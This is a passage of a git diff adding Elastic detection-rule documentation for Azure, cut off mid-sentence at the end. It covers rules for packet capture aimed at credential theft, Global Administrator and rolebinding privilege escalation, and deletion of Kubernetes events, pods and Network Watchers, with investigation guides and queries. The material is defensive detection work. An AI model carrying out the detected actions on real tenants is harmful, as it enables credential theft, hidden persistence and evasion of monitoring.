+*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Full Network Packet Capture Detected* + + +Azure's Packet Capture is a feature of Network Watcher that allows for the inspection of network traffic, useful for diagnosing network issues. However, if misused, it can capture sensitive data from unencrypted traffic, posing a security risk. Adversaries might exploit this to access credentials or other sensitive information. The detection rule identifies suspicious packet capture activities by monitoring specific Azure activity logs for successful operations, helping to flag potential misuse. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific user or service principal associated with the packet capture operation by examining the `azure.activitylogs.operation_name` and `event.dataset` fields. +- Check the timestamp of the detected packet capture activity to determine the exact time frame of the event and correlate it with any other suspicious activities or changes in the environment. +- Investigate the source and destination IP addresses involved in the packet capture to understand the scope and potential impact, focusing on any unencrypted traffic that might have been captured. +- Verify the legitimacy of the packet capture request by contacting the user or team responsible for the operation to confirm if it was authorized and necessary for troubleshooting or other legitimate purposes. +- Assess the risk of exposed sensitive data by identifying any critical systems or services that were part of the captured network traffic, especially those handling credentials or personal information. + + +*False positive analysis* + + +- Routine network diagnostics by authorized personnel can trigger the rule. To manage this, create exceptions for specific user accounts or IP addresses known to perform regular diagnostics. +- Automated network monitoring tools might initiate packet captures as part of their normal operations. Identify these tools and exclude their activities from triggering alerts. +- Scheduled maintenance activities often involve packet captures for performance analysis. Document these schedules and configure the rule to ignore captures during these periods. +- Development and testing environments may frequently use packet capture for debugging purposes. Exclude these environments by filtering based on resource tags or environment identifiers. +- Legitimate security audits may involve packet capture to assess network security. Coordinate with the audit team to whitelist their activities during the audit period. + + +*Response and remediation* + + +- Immediately isolate the affected network segment to prevent further unauthorized packet capture and potential data exfiltration. +- Revoke any suspicious or unauthorized access to Azure Network Watcher and related resources to prevent further misuse. +- Conduct a thorough review of the captured network traffic logs to identify any sensitive data exposure and assess the potential impact. +- Reset credentials and access tokens for any accounts or services that may have been compromised due to exposed unencrypted traffic. +- Implement network encryption protocols to protect sensitive data in transit and reduce the risk of future packet capture exploitation. +- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary. +- Enhance monitoring and alerting for Azure Network Watcher activities to detect and respond to similar threats more effectively in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name: + ( + MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION or + MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION or + MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE + ) and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Network Sniffing +** ID: T1040 +** Reference URL: https://attack.mitre.org/techniques/T1040/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc new file mode 100644 index 0000000000..7532c093df --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user]] +=== Azure Global Administrator Role Addition to PIM User + +Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Global Administrator Role Addition to PIM User* + + +Azure AD's Global Administrator role grants extensive access, allowing users to modify any administrative setting. Privileged Identity Management (PIM) helps manage and monitor such access. Adversaries may exploit this by adding themselves or others to this role, gaining persistent control. The detection rule identifies suspicious role additions by monitoring specific audit logs, focusing on successful role assignments to PIM users, thus helping to flag potential unauthorized access attempts. + + +*Possible investigation steps* + + +- Review the Azure audit logs to confirm the details of the role addition event, focusing on the event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement fields. +- Identify the user account that was added to the Global Administrator role by examining the azure.auditlogs.properties.target_resources.*.display_name field. +- Check the event.outcome field to ensure the role addition was successful and not a failed attempt. +- Investigate the user account's recent activities and login history to determine if there are any anomalies or signs of compromise. +- Verify if the role addition aligns with any recent administrative changes or requests within the organization to rule out legitimate actions. +- Assess the potential impact of the role addition by reviewing the permissions and access levels granted to the user. +- If suspicious activity is confirmed, initiate a response plan to remove unauthorized access and secure the affected accounts. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role for maintenance or updates. To manage this, create exceptions for known IT personnel or scheduled maintenance windows. +- Automated scripts or tools used for role assignments can cause false positives if they frequently add users to the Global Administrator role. Consider excluding these automated processes from monitoring or adjusting the detection rule to account for their activity. +- Temporary project-based role assignments might be flagged as suspicious. Implement a process to document and pre-approve such assignments, allowing for their exclusion from alerts. +- Training or onboarding sessions where new administrators are temporarily granted elevated access can result in false positives. Establish a protocol to notify the monitoring team of these events in advance, so they can be excluded from the detection rule. + + +*Response and remediation* + + +- Immediately revoke the Global Administrator role from any unauthorized PIM user identified in the alert to prevent further unauthorized access. +- Conduct a thorough review of recent changes made by the affected account to identify any unauthorized modifications or suspicious activities. +- Reset the credentials of the compromised account and enforce multi-factor authentication (MFA) to secure the account against further unauthorized access. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities. +- Review and update access policies and role assignments in Azure AD to ensure that only necessary personnel have elevated privileges. +- Document the incident and response actions taken for future reference and to improve incident response procedures. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and + azure.auditlogs.operation_name:("Add eligible member to role in PIM completed (permanent)" or + "Add member to role in PIM completed (timebound)") and + azure.auditlogs.properties.target_resources.*.display_name:"Global Administrator" and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc new file mode 100644 index 0000000000..78646b3be6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-azure-kubernetes-events-deleted]] +=== Azure Kubernetes Events Deleted + +Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Kubernetes Events Deleted* + + +Azure Kubernetes Service (AKS) manages containerized applications using Kubernetes, which logs events like state changes. These logs are crucial for monitoring and troubleshooting. Adversaries may delete these logs to hide their tracks, impairing defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs, flagging successful deletion operations to alert security teams of potential evasion tactics. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking for the operation name "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE" and ensure the event outcome is marked as "Success". +- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs. +- Investigate the timeline of events leading up to and following the deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or configuration changes. +- Check for any other related alerts or anomalies in the Azure environment that might indicate a broader attack or compromise. +- Assess the impact of the deleted events by determining which Kubernetes resources or operations were affected and if any critical logs were lost. +- Review access controls and permissions for the user or service principal involved to ensure they align with the principle of least privilege and adjust if necessary. +- Consider implementing additional monitoring or alerting for similar deletion activities to enhance detection and response capabilities. + + +*False positive analysis* + + +- Routine maintenance activities by authorized personnel may trigger deletion events. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scripts or tools used for log rotation or cleanup might delete events as part of their normal operation. Identify these scripts and exclude their activity from triggering alerts by whitelisting their associated service accounts or IP addresses. +- Misconfigured applications or services that inadvertently delete logs can cause false positives. Review application configurations and adjust them to prevent unnecessary deletions, and exclude these applications from alerts if they are verified as non-threatening. +- Test environments often generate log deletions during setup or teardown processes. Exclude these environments from monitoring or create specific rules that differentiate between production and test environments to avoid unnecessary alerts. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Kubernetes cluster to prevent further unauthorized access or tampering with logs. +- Conduct a thorough review of recent activity logs and access permissions for the affected cluster to identify any unauthorized access or privilege escalation. +- Restore deleted Kubernetes events from backups or snapshots if available, to ensure continuity in monitoring and auditing. +- Implement stricter access controls and audit logging for Kubernetes event deletion operations to prevent unauthorized deletions in the future. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of broader compromise or if the deletion is part of a larger attack campaign. +- Review and update incident response plans to incorporate lessons learned from this event, ensuring quicker detection and response to similar threats in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE" and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc new file mode 100644 index 0000000000..4eb4c20746 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted]] +=== Azure Kubernetes Pods Deleted + +Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Asset Visibility +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Kubernetes Pods Deleted* + + +Azure Kubernetes Service (AKS) enables the deployment, management, and scaling of containerized applications using Kubernetes. Pods, the smallest deployable units in Kubernetes, can be targeted by adversaries to disrupt services or evade detection. Malicious actors might delete pods to cause downtime or hide their activities. The detection rule monitors Azure activity logs for successful pod deletion operations, alerting security teams to potential unauthorized actions that could impact the environment's stability and security. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the details of the pod deletion event, focusing on the operation name "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE" and ensuring the event outcome is marked as "Success". +- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs. +- Check the timeline of events leading up to the pod deletion to identify any unusual or unauthorized access patterns or activities. +- Investigate the specific Kubernetes cluster and namespace where the pod deletion occurred to assess the potential impact on services and applications. +- Cross-reference the deleted pod's details with recent changes or deployments in the environment to determine if the deletion was part of a legitimate maintenance or deployment activity. +- Consult with the relevant application or infrastructure teams to verify if the pod deletion was authorized and necessary, or if it indicates a potential security incident. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel can lead to legitimate pod deletions. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scaling operations might delete pods as part of normal scaling activities. Identify and exclude these operations by correlating with scaling events or using tags that indicate automated processes. +- Development and testing environments often experience frequent pod deletions as part of normal operations. Consider excluding these environments from alerts by using environment-specific identifiers or tags. +- Scheduled job completions may result in pod deletions once tasks are finished. Implement rules to recognize and exclude these scheduled operations by matching them with known job schedules or identifiers. + + +*Response and remediation* + + +- Immediately isolate the affected Kubernetes cluster to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules temporarily. +- Review the Azure activity logs to identify the source of the deletion request, including the user or service principal involved, and verify if the action was authorized. +- Recreate the deleted pods using the latest known good configuration to restore services and minimize downtime. +- Conduct a thorough security assessment of the affected cluster to identify any additional unauthorized changes or indicators of compromise. +- Implement stricter access controls and role-based access management to ensure only authorized personnel can delete pods in the future. +- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected. +- Enhance monitoring and alerting for similar activities by integrating with a Security Information and Event Management (SIEM) system to detect and respond to unauthorized pod deletions promptly. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE" and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ +* Technique: +** Name: System Shutdown/Reboot +** ID: T1529 +** Reference URL: https://attack.mitre.org/techniques/T1529/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc new file mode 100644 index 0000000000..ca5a9279ba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created]] +=== Azure Kubernetes Rolebindings Created + +Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +* https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Kubernetes Rolebindings Created* + +Azure Kubernetes role bindings are crucial for managing access control within Kubernetes clusters, allowing specific permissions to be assigned to users, groups, or service accounts. Adversaries with the ability to create these bindings can escalate privileges by assigning themselves or others high-level roles, such as cluster-admin. The detection rule monitors Azure activity logs for successful creation events of role or cluster role bindings, signaling potential unauthorized privilege escalation attempts. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service account associated with the role binding creation event. Focus on the `event.dataset` and `azure.activitylogs.operation_name` fields to confirm the specific operation. +- Check the `event.outcome` field to ensure the operation was successful and not a failed attempt, which might indicate a misconfiguration or testing. +- Investigate the permissions and roles assigned to the identified user or service account to determine if they have legitimate reasons to create role bindings or cluster role bindings. +- Examine the context of the role binding creation, such as the time of the event and any related activities, to identify any unusual patterns or correlations with other suspicious activities. +- Verify if the role binding grants elevated privileges, such as cluster-admin, and assess the potential impact on the cluster's security posture. +- Cross-reference the event with any recent changes in the cluster's configuration or access policies to understand if the role binding creation aligns with authorized administrative actions. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate users create role bindings for operational purposes. To manage this, identify and whitelist specific user accounts or service accounts that regularly perform these tasks. +- Automated deployment tools or scripts that configure Kubernetes clusters might create role bindings as part of their normal operation. Exclude these tools by filtering out known service accounts or IP addresses associated with these automated processes. +- Scheduled maintenance or updates to the Kubernetes environment can result in multiple role binding creation events. Establish a maintenance window and suppress alerts during this period to avoid unnecessary noise. +- Development and testing environments often have frequent role binding changes. Consider creating separate monitoring rules with adjusted thresholds or risk scores for these environments to reduce false positives. +- Collaboration with the DevOps team can help identify expected role binding changes, allowing for preemptive exclusion of these events from triggering alerts. + + +*Response and remediation* + + +- Immediately revoke any newly created role bindings or cluster role bindings that are unauthorized or suspicious to prevent further privilege escalation. +- Isolate the affected Kubernetes cluster from the network to prevent potential lateral movement or further exploitation by the adversary. +- Conduct a thorough review of recent activity logs to identify any unauthorized access or changes made by the adversary, focusing on the time frame around the alert. +- Reset credentials and access tokens for any compromised accounts or service accounts involved in the unauthorized role binding creation. +- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected. +- Implement additional monitoring and alerting for any future role binding or cluster role binding creation events to ensure rapid detection and response. +- Review and tighten role-based access control (RBAC) policies to ensure that only necessary permissions are granted to users, groups, and service accounts, minimizing the risk of privilege escalation. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name: + ("MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE" or + "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE") and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc new file mode 100644 index 0000000000..7788ababf3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-network-watcher-deletion]] +=== Azure Network Watcher Deletion + +Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-monitoring-overview + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Network Security Monitoring +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Network Watcher Deletion* + + +Azure Network Watcher is a vital tool for monitoring and diagnosing network issues within Azure environments. It provides insights and logging capabilities crucial for maintaining network security. Adversaries may delete Network Watchers to disable these monitoring functions, thereby evading detection. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, flagging successful attempts as potential security threats. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking for the operation name "MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE" and ensuring the event outcome is marked as "Success" or "success". +- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Investigate the timeline of events leading up to the deletion by reviewing related activity logs for any unusual or unauthorized access patterns or changes in permissions. +- Assess the impact of the deletion by determining which resources were being monitored by the deleted Network Watcher and evaluating the potential security implications. +- Check for any other suspicious activities or alerts in the Azure environment that may indicate a broader attack or compromise, focusing on defense evasion tactics. + + +*False positive analysis* + + +- Routine maintenance activities by authorized personnel may trigger the deletion alert. Verify if the deletion aligns with scheduled maintenance and consider excluding these operations from alerts. +- Automated scripts or tools used for infrastructure management might delete Network Watchers as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives. +- Changes in network architecture or resource reallocation can lead to legitimate deletions. Review change management logs to confirm if the deletion was planned and adjust the detection rule to exclude these scenarios. +- Test environments often undergo frequent changes, including the deletion of Network Watchers. If these environments are known to generate false positives, consider creating exceptions for specific resource groups or subscriptions associated with testing. + + +*Response and remediation* + + +- Immediately isolate the affected Azure resources to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules. +- Review Azure activity logs to identify the user or service principal responsible for the deletion. Verify if the action was authorized and investigate any suspicious accounts. +- Restore the deleted Network Watcher by redeploying it in the affected regions to resume monitoring and logging capabilities. +- Conduct a security review of the affected Azure environment to identify any other potential misconfigurations or unauthorized changes. +- Implement stricter access controls and auditing for Azure resources, ensuring that only authorized personnel have the ability to delete critical monitoring tools like Network Watchers. +- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary. +- Enhance detection capabilities by ensuring that alerts for similar deletion activities are configured to notify the security team immediately. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc new file mode 100644 index 0000000000..37629a36b9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified]] +=== Azure Privilege Identity Management Role Modified + +Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-resource-roles-assign-roles +* https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Persistence + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Privilege Identity Management Role Modified* + + +Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. + +This rule identifies the update of PIM role settings, which can indicate that an attacker has already gained enough access to modify role assignment settings. + + +*Possible investigation steps* + + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user account during the past 48 hours. +- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user? +- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day? +- Check if this operation was approved and performed according to the organization's change management policy. +- Contact the account owner and confirm whether they are aware of this activity. +- Examine the account's commands, API calls, and data management actions in the last 24 hours. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +- If this activity didn't follow your organization's change management policies, it should be reviewed by the security team. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and 